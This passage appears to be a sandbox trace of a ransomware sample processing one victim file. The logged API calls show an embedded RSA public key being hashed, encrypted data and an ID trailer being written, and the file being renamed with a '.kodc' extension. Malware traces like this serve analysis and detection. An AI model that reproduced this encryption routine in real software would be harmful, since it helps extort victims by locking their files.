returned 0x5cc [0099.589] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=17323) returned 1 [0099.589] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.592] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x4385, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.592] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.593] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.593] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x43ab, lpOverlapped=0x0) returned 1 [0099.594] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.594] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.594] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.594] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0099.595] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.595] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.595] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.595] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.595] GetLastError () returned 0x0 [0099.595] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.595] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0099.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.595] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.595] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.596] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x43b0) returned 0x9ba6d90 [0099.596] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bc38 [0099.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bc80 [0099.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af10 [0099.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af28 [0099.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.596] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af10 | out: hHeap=0x630000) returned 1 [0099.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af28 | out: hHeap=0x630000) returned 1 [0099.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.597] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af28 [0099.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0099.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a520 [0099.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0099.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331af10 [0099.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0099.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0099.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0099.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.597] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af10 | out: hHeap=0x630000) returned 1 [0099.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af28 | out: hHeap=0x630000) returned 1 [0099.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.598] GetCurrentThreadId () returned 0x42c [0099.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba57c8 [0099.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0099.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.599] GetCurrentThreadId () returned 0x42c [0099.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af28 [0099.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af10 [0099.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0099.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x6868a0 [0099.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655be8 [0099.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655c00 [0099.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7980 [0099.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7998 [0099.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7980 | out: hHeap=0x630000) returned 1 [0099.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7980 [0099.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655c00 | out: hHeap=0x630000) returned 1 [0099.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0099.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af10 | out: hHeap=0x630000) returned 1 [0099.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af10 [0099.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af28 | out: hHeap=0x630000) returned 1 [0099.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0099.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7980 | out: hHeap=0x630000) returned 1 [0099.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0099.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0099.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af10 | out: hHeap=0x630000) returned 1 [0099.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0099.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0099.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7998 | out: hHeap=0x630000) returned 1 [0099.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655be8 | out: hHeap=0x630000) returned 1 [0099.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6868a0 | out: hHeap=0x630000) returned 1 [0099.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9bc80 | out: hHeap=0x630000) returned 1 [0099.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.603] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba6d90*, nNumberOfBytesToWrite=0x43a6, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba6d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x43a6, lpOverlapped=0x0) returned 1 [0099.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba6d90 | out: hHeap=0x630000) returned 1 [0099.603] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x43ab, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.603] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0099.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0099.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0099.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.604] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.604] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.604] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.604] CloseHandle (hObject=0x5cc) returned 1 [0099.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0099.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0099.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0099.605] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GFp qsQfQOaQJIpyl58.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gfp qsqfqoaqjipyl58.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GFp qsQfQOaQJIpyl58.bmp.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gfp qsqfqoaqjipyl58.bmp.kodc")) returned 1 [0099.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.605] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.607] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x392fbdb0, ftCreationTime.dwHighDateTime=0x1d5bfba, ftLastAccessTime.dwLowDateTime=0x6ab4c710, ftLastAccessTime.dwHighDateTime=0x1d5b98c, ftLastWriteTime.dwLowDateTime=0x6ab4c710, 